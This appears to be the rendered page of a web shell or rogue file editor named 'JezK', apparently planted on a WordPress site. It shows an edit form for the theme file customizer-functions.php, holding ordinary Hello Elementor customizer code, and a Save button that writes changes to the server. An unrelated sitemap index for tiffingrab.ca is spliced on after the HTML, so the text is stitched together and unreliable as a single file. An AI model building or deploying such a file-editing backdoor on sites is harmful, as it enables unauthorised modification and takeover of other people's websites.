
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: customizer-functions.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit; // Exit if accessed directly.
}

/**
 * Register Customizer controls for header &amp; footer.
 *
 * @return void
 */
function hello_customizer_register( $wp_customize ) {
	require_once get_template_directory() . &#039;/includes/customizer/customizer-action-links.php&#039;;

	$wp_customize-&gt;add_section(
		&#039;hello-options&#039;,
		[
			&#039;title&#039; =&gt; esc_html__( &#039;Header &amp; Footer&#039;, &#039;hello-elementor&#039; ),
			&#039;capability&#039; =&gt; &#039;edit_theme_options&#039;,
		]
	);

	$wp_customize-&gt;add_setting(
		&#039;hello-header-footer&#039;,
		[
			&#039;sanitize_callback&#039; =&gt; false,
			&#039;transport&#039; =&gt; &#039;refresh&#039;,
		]
	);

	$wp_customize-&gt;add_control(
		new HelloElementor\Includes\Customizer\Hello_Customizer_Action_Links(
			$wp_customize,
			&#039;hello-header-footer&#039;,
			[
				&#039;section&#039; =&gt; &#039;hello-options&#039;,
				&#039;priority&#039; =&gt; 20,
			]
		)
	);
}
add_action( &#039;customize_register&#039;, &#039;hello_customizer_register&#039; );

/**
 * Register Customizer controls for Elementor Pro upsell.
 *
 * @return void
 */
function hello_customizer_register_elementor_pro_upsell( $wp_customize ) {
	if ( function_exists( &#039;elementor_pro_load_plugin&#039; ) ) {
		return;
	}

	require_once get_template_directory() . &#039;/includes/customizer/customizer-upsell.php&#039;;

	$wp_customize-&gt;add_section(
		new HelloElementor\Includes\Customizer\Hello_Customizer_Upsell(
			$wp_customize,
			&#039;hello-upsell-elementor-pro&#039;,
			[
				&#039;heading&#039; =&gt; esc_html__( &#039;Customize your entire website with Elementor Pro&#039;, &#039;hello-elementor&#039; ),
				&#039;description&#039; =&gt; esc_html__( &#039;Build and customize every part of your website, including Theme Parts with Elementor Pro.&#039;, &#039;hello-elementor&#039; ),
				&#039;button_text&#039; =&gt; esc_html__( &#039;Upgrade Now&#039;, &#039;hello-elementor&#039; ),
				&#039;button_url&#039; =&gt; &#039;https://elementor.com/pro/?utm_source=hello-theme-customize&amp;utm_campaign=gopro&amp;utm_medium=wp-dash&#039;,
				&#039;priority&#039; =&gt; 999999,
			]
		)
	);
}
add_action( &#039;customize_register&#039;, &#039;hello_customizer_register_elementor_pro_upsell&#039; );

/**
 * Enqueue Customizer CSS.
 *
 * @return void
 */
function hello_customizer_styles() {
	wp_enqueue_style(
		&#039;hello-elementor-customizer&#039;,
		HELLO_THEME_STYLE_URL . &#039;customizer.css&#039;,
		[],
		HELLO_ELEMENTOR_VERSION
	);
}
add_action( &#039;admin_enqueue_scripts&#039;, &#039;hello_customizer_styles&#039; );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://tiffingrab.ca/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_tag-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
